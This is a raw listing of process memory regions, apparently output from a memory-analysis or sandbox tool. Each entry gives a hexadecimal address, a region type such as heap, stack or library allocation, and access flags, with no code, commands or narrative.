page read and write
1FC55943000
heap
page read and write
1FC621E3000
heap
page read and write
1FC62A9B000
heap
page read and write
1FC60CFA000
heap
page read and write
1FC55156000
heap
page read and write
1FC544C1000
heap
page read and write
314F000
stack
page read and write
1FC5579A000
heap
page read and write
7FFECBAEC000
trusted library allocation
page execute and read and write
1FC54BCD000
heap
page read and write
1FC55212000
heap
page read and write
1FC61B6F000
heap
page read and write
1FC53955000
heap
page read and write
1FC558BB000
heap
page read and write
1FC53A2D000
heap
page read and write
1FC55600000
heap
page read and write
564E000
stack
page read and write
1FC55ABC000
heap
page read and write
1FC557DF000
heap
page read and write
1FC6133C000
heap
page read and write
59A8000
heap
page read and write
1FC54B70000
heap
page read and write
1FC55608000
heap
page read and write
1FC557A6000
heap
page read and write
1FC54621000
heap
page read and write
FA7BBFE000
stack
page read and write
1FC6035A000
heap
page read and write
1FC55A0F000
heap
page read and write
1FC6051D000
heap
page read and write
1FC538FD000
heap
page read and write
5DDE000
stack
page read and write
1FC54E6D000
heap
page read and write
1FC55702000
heap
page read and write
1FC53B62000
heap
page read and write
1FC6027C000
heap
page read and write
1FC53EFD000
heap
page read and write
1FC55639000
heap
page read and write
1FC601F2000
heap
page read and write
1FC544F1000
heap
page read and write
3E3F000
stack
page read and write
1FC5516A000
heap
page read and write
1FC559DB000
heap
page read and write
1FC61B08000
heap
page read and write
1FC61492000
heap
page read and write
1FC5589E000
heap
page read and write
1FC619E2000
heap
page read and write
1FC5524E000
heap
page read and write
1FC553A2000
heap
page read and write
5A4E000
heap
page read and write
1FC55006000
heap
page read and write
E40000
heap
page read and write
1FC5591B000
heap
page read and write
1FC605FA000
heap
page read and write
1FC55514000
heap
page read and write
1FC54C95000
heap
page read and write
1FC53BCC000
heap
page read and write
1FC4FC26000
heap
page read and write
1FC5558D000
heap
page read and write
EEE000
heap
page read and write
7FFECC3B0000
trusted library allocation
page read and write
1FC555BA000
heap
page read and write
1FC54E39000
heap
page read and write
F30000
heap
page read and write
1FC5448D000
heap
page read and write
1FC53960000
heap
page read and write
26C74EB0000
heap
page execute and read and write
1FC545C9000
heap
page read and write
1FC54FB1000
heap
page read and write
1FC55544000
heap
page read and write
7DF4D82A0000
trusted library allocation
page execute and read and write
1FC5569C000
heap
page read and write
1FC5FDC6000
heap
page read and write
1FC5582E000
heap
page read and write
7FFECBB50000
trusted library allocation
page execute and read and write
7FFECC240000
trusted library allocation
page read and write
1FC5492F000
heap
page read and write
1FC556D2000
heap
page read and write
59E0000
heap
page read and write
1FC555BC000
heap
page read and write
1FC54CB5000
heap
page read and write
1FC60594000
heap
page read and write
6CAC0000
unkown
page readonly
1FC55872000
heap
page read and write
1FC55A43000
heap
page read and write
1FC5593B000
heap
page read and write
1FC5577B000
heap
page read and write
7FFECC1F0000
trusted library allocation
page read and write
1FC6143E000
heap
page read and write
1FC557EB000
heap
page read and write
1FC61DFC000
heap
page read and write
1FC54CE9000
heap
page read and write
1FC558D3000
heap
page read and write
1FC5555D000
heap
page read and write
1FC556CD000
heap
page read and write
1FC55756000
heap
page read and write
EFA000
heap
page read and write
1FC54DA5000
heap
page read and write
1FC620AE000
heap
page read and write
1FC55615000
heap
page read and write
1FC557CE000
heap
page read and write
26C00F61000
trusted library allocation
page read and write
1FC53B72000
heap
page read and write
1FC551E6000
heap
page read and write
1FC603E4000
heap
page read and write
F30000
heap
page read and write
1FC5397D000
heap
page read and write
1FC539D9000
heap
page read and write
1FC544B9000
heap
page read and write
2C70000
heap
page read and write
1FC60390000
heap
page read and write
1FC54E75000
heap
page read and write
1FC5490B000
heap
page read and write
1FC623B4000
heap
page read and write
1FC54D49000
heap
page read and write
1FC5394C000
heap
page read and write
1FC54853000
heap
page read and write
1FC5579E000
heap
page read and write
1FC54843000
heap
page read and write
1FC4FCCB000
heap
page read and write
1FC622D6000
heap
page read and write
1FC5399D000
heap
page read and write
1FC622B2000
heap
page read and write
1FC612B2000
heap
page read and write
1FC557A2000
heap
page read and write
1FC62A38000
heap
page read and write
1FC53941000
heap
page read and write
1FC55206000
heap
page read and write
1FC60480000
heap
page read and write
1FC5571D000
heap
page read and write
26C102E6000
trusted library allocation
page read and write
1FC54E3D000
heap
page read and write
EDE000
heap
page read and write
26C72F1C000
heap
page read and write
1FC54E01000
heap
page read and write
1FC555E8000
heap
page read and write
1FC555BD000
heap
page read and write
1FC5531A000
heap
page read and write
7FFECBDAD000
trusted library allocation
page read and write
4010000
heap
page read and write
1FC54D21000
heap
page read and write
1FC53B75000
heap
page read and write
1FC55372000
heap
page read and write
1FC55993000
heap
page read and write
5997000
heap
page read and write
1FC624EC000
heap
page read and write
1FC55823000
heap
page read and write
26C72F58000
heap
page read and write
1FC5FF52000
heap
page read and write
1FC54F6D000
heap
page read and write
1FC55767000
heap
page read and write
2D7E000
stack
page read and write
1FC556A8000
heap
page read and write
1FC555EC000
heap
page read and write
1FC5584E000
heap
page read and write
1FC62138000
heap
page read and write
1FC558BB000
heap
page read and write
1FC55510000
heap
page read and write
1FC54599000
heap
page read and write
1FC55832000
heap
page read and write
F2D000
heap
page read and write
1FC555CB000
heap
page read and write
1FC552A2000
heap
page read and write
1FC60F64000
heap
page read and write
1FC5537E000
heap
page read and write
1FC53A79000
heap
page read and write
1FC54439000
heap
page read and write
1FC55576000
heap
page read and write
1FC54C9D000
heap
page read and write
1FC5522E000
heap
page read and write
1FC625DC000
heap
page read and write
1FC551EA000
heap
page read and write
59CF000
heap
page read and write
1FC54DB5000
heap
page read and write
26C1005E000
trusted library allocation
page read and write
7FFECC440000
trusted library allocation
page read and write
1FC54539000
heap
page read and write
1FC54D5D000
heap
page read and write
1FC54772000
heap
page read and write
1FC53969000
heap
page read and write
1FC55660000
heap
page read and write
1FC55987000
heap
page read and write
1FC629F7000
heap
page read and write
1FC6151C000
heap
page read and write
1FC54A86000
heap
page read and write
1FC54DFD000
heap
page read and write
1FC54A8A000
heap
page read and write
1FC624DA000
heap
page read and write
1FC54CED000
heap
page read and write
1FC5FFDC000
heap
page read and write
1FC54461000
heap
page read and write
26C0040B000
trusted library allocation
page read and write
1FC558EF000
heap
page read and write
7FFECC080000
trusted library allocation
page read and write
7FFECBF10000
trusted library allocation
page read and write
596C000
heap
page read and write
7FFECC120000
trusted library allocation
page read and write
1FC62B0D000
heap
page read and write
26C72F10000
heap
page read and write
1FC554E4000
heap
page read and write
1FC558AA000
heap
page read and write
1FC548E3000
heap
page read and write
1FC60630000
heap
page read and write
7FFECBCF0000
trusted library allocation
page read and write
7FFECBD80000
trusted library allocation
page read and write
60B1000
heap
page read and write
1FC5458D000
heap
page read and write
26C003CB000
trusted library allocation
page read and write
1FC5500E000
heap
page read and write
34A2000
heap
page read and write
1FC545A9000
heap
page read and write
1FC5573E000
heap
page read and write
1FC61CFA000
heap
page read and write
1FC54B10000
heap
page read and write
5992000
heap
page read and write
1FC5519E000
heap
page read and write
1FC54DF9000
heap
page read and write
1FC5729F000
heap
page read and write
EC9000
heap
page read and write
1FC55630000
heap
page read and write
1FC558FB000
heap
page read and write
3824000
heap
page read and write
1FC53A39000
heap
page read and write
1FC55619000
heap
page read and write
EEB000
heap
page read and write
1FC54E05000
heap
page read and write
1FC55172000
heap
page read and write
1FC620AB000
heap
page read and write
1FC552B6000
heap
page read and write
FA7BA7E000
stack
page read and write
1FC55575000
heap
page read and write
1FC61C71000
heap
page read and write
1FC55A5B000
heap
page read and write
1FC54EA9000
heap
page read and write
1FC5553D000
heap
page read and write
1FC53991000
heap
page read and write
1FC54DD9000
heap
page read and write
7FFECBDB0000
trusted library allocation
page read and write
1FC55534000
heap
page read and write
1FC559C7000
heap
page read and write
7FFECBF20000
trusted library allocation
page read and write
1FC550C2000
heap
page read and write
1FC61205000
heap
page read and write
1FC624D7000
heap
page read and write
1FC54888000
heap
page read and write
1FC55699000
heap
page read and write
1FC555AA000
heap
page read and write
6CACA000
unkown
page read and write
73A85000
unkown
page readonly
1FC54515000
heap
page read and write
5A56000
heap
page read and write
1FC55937000
heap
page read and write
1FC623FC000
heap
page read and write
3C70000
unclassified section
page read and write
1FC555C7000
heap
page read and write
1FC55A07000
heap
page read and write
1FC5FFA6000
heap
page read and write
1FC539E1000
heap
page read and write
1FC60EFE000
heap
page read and write
1FC55166000
heap
page read and write
1FC54F7D000
heap
page read and write
1FC53905000
heap
page read and write
1FC60A24000
heap
page read and write
1FC55737000
heap
page read and write
1FC5475F000
heap
page read and write
1FC552CA000
heap
page read and write
1FC55691000
heap
page read and write
1FC553CE000
heap
page read and write
1FC61757000
heap
page read and write
5BB0000
heap
page read and write
1FC51A56000
heap
page read and write
1FC5570D000
heap
page read and write
1FC612A0000
heap
page read and write
26C75242000
heap
page read and write
1FC55508000
heap
page read and write
1FC5531E000
heap
page read and write
1FC539DD000
heap
page read and write
1FC5533A000
heap
page read and write
7FFECBA33000
trusted library allocation
page execute and read and write
1FC61732000
heap
page read and write
1FC54EC9000
heap
page read and write
1FC61A90000
heap
page read and write
1FC557D6000
heap
page read and write
1FC54A62000
heap
page read and write
1FC552E2000
heap
page read and write
1FC604A4000
heap
page read and write
26C7519A000
heap
page read and write
1FC552BA000
heap
page read and write
1FC61594000
heap
page read and write
1FC602F5000
heap
page read and write
1FC5575F000
heap
page read and write
1FC54D3D000
heap
page read and write
1FC53BF4000
heap
page read and write
1FC55792000
heap
page read and write
1FC55322000
heap
page read and write
26C003E3000
trusted library allocation
page read and write
1FC5507E000
heap
page read and write
1FC55719000
heap
page read and write
7FFECC0D0000
trusted library allocation
page read and write
1FC6070E000
heap
page read and write
1FC626F0000
heap
page read and write
1FC558B6000
heap
page read and write
1FC555D3000
heap
page read and write
1FC53A31000
heap
page read and write
1FC6099A000
heap
page read and write
1FC54BED000
heap
page read and write
1FC54DD5000
heap
page read and write
1FC55510000
heap
page read and write
1FC54C41000
heap
page read and write
1FC60F76000
heap
page read and write
1FC54F85000
heap
page read and write
1FC54A7A000
heap
page read and write
F35000
heap
page read and write
1FC53921000
heap
page read and write
1FC62B59000
heap
page read and write
1FC557AE000
heap
page read and write
1FC558DF000
heap
page read and write
1FC53BA6000
heap
page read and write
26C01C8B000
trusted library allocation
page read and write
1FC55232000
heap
page read and write
1FC555DB000
heap
page read and write
5A9E000
stack
page read and write
1FC55132000
heap
page read and write
26C016AF000
trusted library allocation
page read and write
26C01C8F000
trusted library allocation
page read and write
1FC53970000
heap
page read and write
26C003E7000
trusted library allocation
page read and write
1FC55A33000
heap
page read and write
441000
unkown
page execute read
1FC5513E000
heap
page read and write
1FC54ABA000
heap
page read and write
EF2000
heap
page read and write
1FC54DED000
heap
page read and write
1FC552F2000
heap
page read and write
1FC54C85000
heap
page read and write
1FC54D39000
heap
page read and write
1FC609D1000
heap
page read and write
1FC519B7000
heap
page read and write
1FC55947000
heap
page read and write
1FC555C3000
heap
page read and write
26C10606000
trusted library allocation
page read and write
1FC54D19000
heap
page read and write
1FC61F9A000
heap
page read and write
1FC623E7000
heap
page read and write
1FC54E0D000
heap
page read and write
1FC61168000
heap
page read and write
1FC555E3000
heap
page read and write
1FC53A15000
heap
page read and write
1FC55777000
heap
page read and write
1FC5578E000
heap
page read and write
1FC551CA000
heap
page read and write
1FC51AFE000
heap
page read and write
1FC623C6000
heap
page read and write
3490000
heap
page read and write
1FC5453C000
heap
page read and write
1FC545B9000
heap
page read and write
7FFECBC76000
trusted library allocation
page read and write
111F7000
unkown
page readonly
1FC550CE000
heap
page read and write
EE4000
heap
page read and write
1FC5505A000
heap
page read and write
1FC559B9000
heap
page read and write
7FFECC400000
trusted library allocation
page read and write
1FC55732000
heap
page read and write
1FC553C6000
heap
page read and write
1FC55716000
heap
page read and write
26C00D62000
trusted library allocation
page read and write
1FC55694000
heap
page read and write
1FC6137E000
heap
page read and write
1FC556D1000
heap
page read and write
1FC54B60000
heap
page read and write
7FFECC250000
trusted library allocation
page read and write
1FC555A1000
heap
page read and write
1FC5FD90000
heap
page read and write
1FC61306000
heap
page read and write
26C72F14000
heap
page read and write
26C74EFB000
heap
page read and write
1FC556FD000
heap
page read and write
1FC54CA5000
heap
page read and write
1FC55096000
heap
page read and write
11000000
unkown
page readonly
1FC558DA000
heap
page read and write
1FC61C0A000
heap
page read and write
1FC6152F000
heap
page read and write
1FC548AB000
heap
page read and write
1FC54A57000
heap
page read and write
1FC54DCD000
heap
page read and write
1FC55500000
heap
page read and write
1FC6197C000
heap
page read and write
1FC550FE000
heap
page read and write
7FFECBEC0000
trusted library allocation
page read and write
7FFECBCE0000
trusted library allocation
page read and write
1FC53B6E000
heap
page read and write
1FC557DE000
heap
page read and write
1FC55382000
heap
page read and write
1FC558C7000
heap
page read and write
1FC54894000
heap
page read and write
1FC55644000
heap
page read and write
1FC55788000
heap
page read and write
1FC52877000
heap
page read and write
1FC556C9000
heap
page read and write
1FC54B94000
heap
page read and write
26C0059F000
trusted library allocation
page read and write
1FC556D9000
heap
page read and write
1FC60946000
heap
page read and write
1FC5565D000
heap
page read and write
1FC55ABB000
heap
page read and write
1FC60958000
heap
page read and write
7FFECC100000
trusted library allocation
page read and write
7FFECBA4B000
trusted library allocation
page read and write
EFA000
heap
page read and write
1FC54C49000
heap
page read and write
1FC54AAE000
heap
page read and write
1FC62339000
heap
page read and write
1FC61000000
heap
page read and write
1FC6050A000
heap
page read and write
1FC54833000
heap
page read and write
1FC5577A000
heap
page read and write
1FC55863000
heap
page read and write
1FC615CA000
heap
page read and write
1FC55917000
heap
page read and write
1FC54F11000
heap
page read and write
7FFECBC80000
trusted library allocation
page read and write
1FC61D30000
heap
page read and write
1FC60FDD000
heap
page read and write
26C751AA000
heap
page read and write
1FC61552000
heap
page read and write
1FC54AC6000
heap
page read and write
EA7000
heap
page read and write
6CAD0000
unkown
page readonly
1FC57CD0000
heap
page read and write
1FC60697000
heap
page read and write
1FC5461D000
heap
page read and write
1FC53A4C000
heap
page read and write
1FC548A6000
heap
page read and write
7FFECBA30000
trusted library allocation
page read and write
1FC5584B000
heap
page read and write
1FC55550000
heap
page read and write
599D000
heap
page read and write
1FC62B4E000
heap
page read and write
1FC54E35000
heap
page read and write
1FC54C89000
heap
page read and write
26C00BDE000
trusted library allocation
page read and write
26C00B5C000
trusted library allocation
page read and write
1FC557E6000
heap
page read and write
1FC62995000
heap
page read and write
1FC61642000
heap
page read and write
1FC607AA000
heap
page read and write
E20000
heap
page read and write
1FC53A8D000
heap
page read and write
1FC54605000
heap
page read and write
1FC54DBD000
heap
page read and write
1FC54868000
heap
page read and write
7FFECC210000
trusted library allocation
page read and write
1FC550B6000
heap
page read and write
5BA0000
heap
page read and write
1FC55086000
heap
page read and write
1120B000
unkown
page readonly
1FC5583E000
heap
page read and write
1FC6286D000
heap
page read and write
1FC547F4000
heap
page read and write
EFA000
heap
page read and write
1FC60C5E000
heap
page read and write
1FC61A06000
heap
page read and write
7FFECBE61000
trusted library allocation
page read and write
1FC54FF2000
heap
page read and write
1FC54C5D000
heap
page read and write
1FC54CF5000
heap
page read and write
1FC55518000
heap
page read and write
1FC54C01000
heap
page read and write
1FC54FA9000
heap
page read and write
26C74A96000
heap
page read and write
7FFECC030000
trusted library allocation
page read and write
1FC55559000
heap
page read and write
1FC53A35000
heap
page read and write
1FC60AE4000
heap
page read and write
1FC5595B000
heap
page read and write
1FC54C75000
heap
page read and write
26C01943000
trusted library allocation
page read and write
1FC556E1000
heap
page read and write
5A0D000
heap
page read and write
1FC54C4D000
heap
page read and write
1FC559AF000
heap
page read and write
1FC55571000
heap
page read and write
1FC60BF8000
heap
page read and write
26C72ED0000
heap
page read and write
1FC61ECE000
heap
page read and write
1FC54AF2000
heap
page read and write
1FC5525E000
heap
page read and write
1FC55977000
heap
page read and write
BBB000
stack
page read and write
1FC558A3000
heap
page read and write
1FC551D2000
heap
page read and write
1FC558CA000
heap
page read and write
1FC54FDA000
heap
page read and write
1FC551E2000
heap
page read and write
1FC53EFC000
heap
page read and write
1FC557C6000
heap
page read and write
1FC5554D000
heap
page read and write
1FC54BA4000
heap
page read and write
1FC51A36000
heap
page read and write
1FC5572A000
heap
page read and write
59F1000
heap
page read and write
1FC54571000
heap
page read and write
26C00DB9000
trusted library allocation
page read and write
1FC55126000
heap
page read and write
1FC605E8000
heap
page read and write
1FC539CD000
heap
page read and write
1FC60054000
heap
page read and write
5993000
heap
page read and write
1FC54E25000
heap
page read and write
1FC54F91000
heap
page read and write
1FC558EA000
heap
page read and write
1FC61AA2000
heap
page read and write
1FC552CE000
heap
page read and write
1FC62270000
heap
page read and write
1FC53909000
heap
page read and write
1FC54615000
heap
page read and write
7FFECC480000
trusted library allocation
page read and write
1FC6026A000
heap
page read and write
1FC53984000
heap
page read and write
1FC613B4000
heap
page read and write
1FC614A4000
heap
page read and write
1FC6045C000
heap
page read and write
EEE000
heap
page read and write
1FC5199B000
heap
page read and write
1FC622E8000
heap
page read and write
1FC559BB000
heap
page read and write
1FC62715000
heap
page read and write
1FC5557D000
heap
page read and write
1FC54E4D000
heap
page read and write
1FC552A6000
heap
page read and write
1FC53965000
heap
page read and write
1FC55997000
heap
page read and write
1FC53BC9000
heap
page read and write
1FC545A5000
heap
page read and write
1FC57DD0000
heap
page read and write
1FC60C70000
heap
page read and write
1FC539BD000
heap
page read and write
1FC5551C000
heap
page read and write
1FC53AE6000
heap
page read and write
1FC5534E000
heap
page read and write
1FC5581F000
heap
page read and write
1FC5534A000
heap
page read and write
1FC53A7D000
heap
page read and write
7FFECC280000
trusted library allocation
page read and write
1FC55953000
heap
page read and write
F30000
heap
page read and write
1FC602E2000
heap
page read and write
1FC559EB000
heap
page read and write
1FC54455000
heap
page read and write
1FC54B24000
heap
page read and write
1FC5581E000
heap
page read and write
1FC60246000
heap
page read and write
1FC55A9B000
heap
page read and write
1FC51A84000
heap
page read and write
7FFECBEB0000
trusted library allocation
page read and write
7FFECBF40000
trusted library allocation
page read and write
1FC5573B000
heap
page read and write
1FC53BB9000
heap
page read and write
26C72F30000
heap
page read and write
1FC552CE000
heap
page read and write
1FC5509A000
heap
page read and write
1FC60E62000
heap
page read and write
1FC55A4B000
heap
page read and write
1FC558C2000
heap
page read and write
1FC55907000
heap
page read and write
1FC604F8000
heap
page read and write
1FC54FA1000
heap
page read and write
60B2000
heap
page read and write
1FC54AB2000
heap
page read and write
1FC54F9D000
heap
page read and write
1FC54609000
heap
page read and write
1FC54BFD000
heap
page read and write
1FC5559E000
heap
page read and write
1FC5589F000
heap
page read and write
1FC53BB3000
heap
page read and write
1FC550BE000
heap
page read and write
1FC54E7D000
heap
page read and write
59A2000
heap
page read and write
26C75246000
heap
page read and write
1FC55A7F000
heap
page read and write
1FC62612000
heap
page read and write
26C0040F000
trusted library allocation
page read and write
1FC5587B000
heap
page read and write
1FC55326000
heap
page read and write
1FC544B1000
heap
page read and write
1FC556E1000
heap
page read and write
1FC55757000
heap
page read and write
1FC55570000
heap
page read and write
1FC5584A000
heap
page read and write
26C10061000
trusted library allocation
page read and write
1FC544ED000
heap
page read and write
1FC552AE000
heap
page read and write
1FC556A5000
heap
page read and write
1FC554FE000
heap
page read and write
1FC5FDD8000
heap
page read and write
F2E000
heap
page read and write
7FFECC590000
trusted library allocation
page read and write
1FC550B2000
heap
page read and write
1FC61E20000
heap
page read and write
EAA000
heap
page read and write
1FC53FFD000
heap
page read and write
1FC55A37000
heap
page read and write
7FFECC0F0000
trusted library allocation
page read and write
7FFECBED0000
trusted library allocation
page read and write
1FC6196A000
heap
page read and write
1FC541FD000
heap
page read and write
1FC54A96000
heap
page read and write
1FC54501000
heap
page read and write
1FC54820000
heap
page read and write
1FC55534000
heap
page read and write
1FC55725000
heap
page read and write
11001000
unkown
page execute read
1FC6215C000
heap
page read and write
1FC61078000
heap
page read and write
1FC5585F000
heap
page read and write
1FC557EA000
heap
page read and write
1FC54D99000
heap
page read and write
1FC545B1000
heap
page read and write
1FC5529E000
heap
page read and write
1420000
heap
page read and write
54BE000
stack
page read and write
440000
unkown
page readonly
1FC5443D000
heap
page read and write
1FC54AC2000
heap
page read and write
59F5000
heap
page read and write
1FC60B6E000
heap
page read and write
1FC5FB9F000
heap
page read and write
1FC625CA000
heap
page read and write
1FC53A0D000
heap
page read and write
1FC55674000
heap
page read and write
7FFECC370000
trusted library allocation
page read and write
1FC54AE2000
heap
page read and write
1FC5398C000
heap
page read and write
1FC54A6E000
heap
page read and write
1FC555F8000
heap
page read and write
1FC62486000
heap
page read and write
1FC551A6000
heap
page read and write
1FC61958000
heap
page read and write
1FC61D72000
heap
page read and write
26C73195000
heap
page read and write
7FFECBD73000
trusted library allocation
page read and write
1FC55ABB000
heap
page read and write
1FC53CFD000
heap
page read and write
6091000
heap
page read and write
1FC556DD000
heap
page read and write
1FC54F0D000
heap
page read and write
F3C000
heap
page read and write
1FC54481000
heap
page read and write
1FC54D61000
heap
page read and write
1FC5390D000
heap
page read and write
1FC54EBD000
heap
page read and write
1FC542FE000
heap
page read and write
F3B000
heap
page read and write
7FFECBA40000
trusted library allocation
page read and write
1FC54F49000
heap
page read and write
1FC55753000
heap
page read and write
1FC60204000
heap
page read and write
1FC54579000
heap
page read and write
1125D000
unkown
page readonly
1FC555B5000
heap
page read and write
1FC5526A000
heap
page read and write
1FC53935000
heap
page read and write
1FC6290A000
heap
page read and write
1FC550C6000
heap
page read and write
1FC55737000
heap
page read and write
1FC55A8B000
heap
page read and write
1FC5527E000
heap
page read and write
1FC550FA000
heap
page read and write
1FC5575A000
heap
page read and write
1FC558C6000
heap
page read and write
1FC552E6000
heap
page read and write
1FC53FFE000
heap
page read and write
1FC54B54000
heap
page read and write
1FC557D2000
heap
page read and write
59F3000
heap
page read and write
60AD000
heap
page read and write
1FC559D3000
heap
page read and write
1FC60FDC000
heap
page read and write
1FC54C31000
heap
page read and write
1FC5567C000
heap
page read and write
1FC555AE000
heap
page read and write
1FC55A23000
heap
page read and write
26C74FB6000
heap
page read and write
1FC622FA000
heap
page read and write
1FC60E74000
heap
page read and write
6090000
heap
page read and write
F30000
heap
page read and write
1FC6141B000
heap
page read and write
6CD56000
unkown
page write copy
1FC5590B000
heap
page read and write
1FC5556D000
heap
page read and write
1FC539F1000
heap
page read and write
1FC55635000
heap
page read and write
1FC55729000
heap
page read and write
1FC53DFC000
heap
page read and write
1FC559DF000
heap
page read and write
1FC61216000
heap
page read and write
1FC550E6000
heap
page read and write
1FC5508E000
heap
page read and write
26C72E00000
heap
page read and write
5A4A000
heap
page read and write
7FFECBA34000
trusted library allocation
page read and write
1FC55886000
heap
page read and write
1FC54A82000
heap
page read and write
1FC54CC9000
heap
page read and write
1FC53A45000
heap
page read and write
1FC545DD000
heap
page read and write
1FC53B66000
heap
page read and write
1FC55783000
heap
page read and write
1FC55680000
heap
page read and write
26C1006F000
trusted library allocation
page read and write
1FC55746000
heap
page read and write
1FC554C1000
heap
page read and write
EBD000
heap
page read and write
1FC61A5A000
heap
page read and write
1FC55392000
heap
page read and write
26C72E10000
heap
page read and write
59EF000
heap
page read and write
1FC551B6000
heap
page read and write
1FC53989000
heap
page read and write
1FC54FD1000
heap
page read and write
F14000
heap
page read and write
1FC5530A000
heap
page read and write
1FC5565C000
heap
page read and write
1FC54C69000
heap
page read and write
1FC60CD6000
heap
page read and write
59D2000
heap
page read and write
1FC54A72000
heap
page read and write
7FFECC3A0000
trusted library allocation
page read and write
7FFECC540000
trusted library allocation
page read and write
1FC55A0B000
heap
page read and write
1FC5586B000
heap
page read and write
1FC551BA000
heap
page read and write
1FC5509E000
heap
page read and write
1FC53911000
heap
page read and write
1FC53995000
heap
page read and write
1457000
heap
page read and write
1FC555F4000
heap
page read and write
1FC5559D000
heap
page read and write
1FC545C5000
heap
page read and write
1FC559CF000
heap
page read and write
26C72E70000
heap
page read and write
1FC54F45000
heap
page read and write
1FC559C3000
heap
page read and write
1FC54631000
heap
page read and write
7FFECC090000
trusted library allocation
page read and write
1FC60066000
heap
page read and write
1FC54D29000
heap
page read and write
1FC615DC000
heap
page read and write
1FC62ACA000
heap
page read and write
1FC626DE000
heap
page read and write
1FC55002000
heap
page read and write
26C00BBE000
trusted library allocation
page read and write
1FC5511A000
heap
page read and write
55FF000
stack
page read and write
3C6E000
stack
page read and write
1FC5579A000
heap
page read and write
1FC5553E000
heap
page read and write
1FC54A5E000
heap
page read and write
1FC55312000
heap
page read and write
7FFECBC90000
trusted library allocation
page read and write
1FC61D96000
heap
page read and write
1FC54F51000
heap
page read and write
1FC5571E000
heap
page read and write
1FC54589000
heap
page read and write
1FC554E0000
heap
page read and write
1FC544DD000
heap
page read and write
1FC53B76000
heap
page read and write
1FC55500000
heap
page read and write
1FC55796000
heap
page read and write
1FC558CF000
heap
page read and write
1FC557EF000
heap
page read and write
1FC5532A000
heap
page read and write
1FC54FC1000
heap
page read and write
1FC54FF6000
heap
page read and write
1FC55A83000
heap
page read and write
1FC54446000
heap
page read and write
7FFECBD60000
trusted library allocation
page read and write
1FC55AAB000
heap
page read and write
1FC54D51000
heap
page read and write
1FC548E7000
heap
page read and write
1FC5453D000
heap
page read and write
1FC5488C000
heap
page read and write
1FC555C3000
heap
page read and write
7FFECBCB5000
trusted library allocation
page read and write
1FC5561D000
heap
page read and write
FA7CB4E000
stack
page read and write
7FFECC1E0000
trusted library allocation
page read and write
1FC545E1000
heap
page read and write
1FC55136000
heap
page read and write
1FC5550C000
heap
page read and write
112B4000
unkown
page readonly
1FC5384D000
heap
page read and write
1FC55684000
heap
page read and write
1FC55332000
heap
page read and write
1FC55867000
heap
page read and write
1FC5586A000
heap
page read and write
7FFECC0C0000
trusted library allocation
page read and write
1FC55A1F000
heap
page read and write
1FC54D95000
heap
page read and write
1FC53979000
heap
page read and write
1FC5FF2E000
heap
page read and write
1FC54509000
heap
page read and write
1FC5393D000
heap
page read and write
1FC55618000
heap
page read and write
1FC55903000
heap
page read and write
1FC552B2000
heap
page read and write
1FC61C6D000
heap
page read and write
ED4000
heap
page read and write
442000
unkown
page readonly
1FC54EF9000
heap
page read and write
1FC54ED9000
heap
page read and write
1FC548B6000
heap
page read and write
1FC55092000
heap
page read and write
1FC6036C000
heap
page read and write
1FC5443D000
heap
page read and write
1FC55A87000
heap
page read and write
1FC559A3000
heap
page read and write
1FC60D84000
heap
page read and write
1FC544C5000
heap
page read and write
1FC557DA000
heap
page read and write
1FC600CC000
heap
page read and write
1FC55AB7000
heap
page read and write
1FC62654000
heap
page read and write
1FC6142C000
heap
page read and write
7FFECC050000
trusted library allocation
page read and write
1FC54A5A000
heap
page read and write
1FC54EF1000
heap
page read and write
1FC55705000
heap
page read and write
7FFECBC5A000
trusted library allocation
page read and write
1FC5572D000
heap
page read and write
1FC6269C000
heap
page read and write
1FC54FEE000
heap
page read and write
1FC548AA000
heap
page read and write
1FC5FFCA000
heap
page read and write
EED000
heap
page read and write
1FC55AC0000
heap
page read and write
1FC55776000
heap
page read and write
1FC544C9000
heap
page read and write
1FC621E6000
heap
page read and write
1FC61B5D000
heap
page read and write
1FC5595F000
heap
page read and write
1FC5726E000
heap
page read and write
7FFECBF80000
trusted library allocation
page read and write
26C0168B000
trusted library allocation
page read and write
7FFECBF30000
trusted library allocation
page read and write
1FC5597B000
heap
page read and write
1FC5443C000
heap
page read and write
26C00B7C000
trusted library allocation
page read and write
7FFECC0E0000
trusted library allocation
page read and write
1FC54830000
heap
page read and write
1FC55346000
heap
page read and write
1FC5518E000
heap
page read and write
1FC54BCD000
heap
page read and write
FA7CBCE000
stack
page read and write
1FC55743000
heap
page read and write
1FC5FEEC000
heap
page read and write
5A24000
heap
page read and write
1FC555D7000
heap
page read and write
1FC55504000
heap
page read and write
1FC5456D000
heap
page read and write
1FC55737000
heap
page read and write
1FC55236000
heap
page read and write
1FC600DE000
heap
page read and write
1FC540FE000
heap
page read and write
E4E000
heap
page read and write
1FC54DE1000
heap
page read and write
1FC61DBA000
heap
page read and write
1FC609BE000
heap
page read and write
1FC557AE000
heap
page read and write
1FC556C1000
heap
page read and write
1FC53929000
heap
page read and write
1FC54F99000
heap
page read and write
1FC61916000
heap
page read and write
FA7BF7E000
stack
page read and write
1FC53A73000
heap
page read and write
1FC61C1C000
heap
page read and write
26C730A0000
trusted library allocation
page read and write
1FC55152000
heap
page read and write
F3B000
heap
page read and write
1FC55579000
heap
page read and write
1FC60B4A000
heap
page read and write
1FC54FEA000
heap
page read and write
7FFECC140000
trusted library allocation
page read and write
1FC55803000
heap
page read and write
26C00DA2000
trusted library allocation
page read and write
26C00B26000
trusted library allocation
page read and write
26C74F31000
heap
page read and write
1FC5584F000
heap
page read and write
1FC54B30000
heap
page read and write
1FC609D0000
heap
page read and write
1FC55736000
heap
page read and write
1FC555FC000
heap
page read and write
1FC6233C000
heap
page read and write
1450000
heap
page read and write
1FC54870000
heap
page read and write
7FFECC290000
trusted library allocation
page read and write
1FC61F34000
heap
page read and write
1FC55689000
heap
page read and write
1FC54D35000
heap
page read and write
1FC554FD000
heap
page read and write
1FC55A57000
heap
page read and write
1FC54DA9000
heap
page read and write
1FC61E32000
heap
page read and write
34B2000
heap
page read and write
7FFECBCB0000
trusted library allocation
page read and write
1FC556AD000
heap
page read and write
1FC55336000
heap
page read and write
7FFECC160000
trusted library allocation
page execute and read and write
1FC53968000
heap
page read and write
1FC5483B000
heap
page read and write
1FC55621000
heap
page read and write
26C00B66000
trusted library allocation
page read and write
1FC544A9000
heap
page read and write
1FC55282000
heap
page read and write
1FC55796000
heap
page read and write
F0C000
heap
page read and write
1FC53047000
heap
page read and write
26C73190000
heap
page read and write
1FC55611000
heap
page read and write
1FC544A5000
heap
page read and write
1FC6061E000
heap
page read and write
1FC557F3000
heap
page read and write
1FC55222000
heap
page read and write
1FC54B88000
heap
page read and write
5B9F000
stack
page read and write
1FC55792000
heap
page read and write
